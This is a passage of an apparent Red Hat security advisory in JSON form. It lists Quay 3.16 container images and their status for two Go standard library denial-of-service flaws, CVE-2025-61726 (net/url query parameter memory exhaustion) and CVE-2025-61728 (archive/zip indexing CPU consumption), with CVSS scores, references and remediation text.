"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
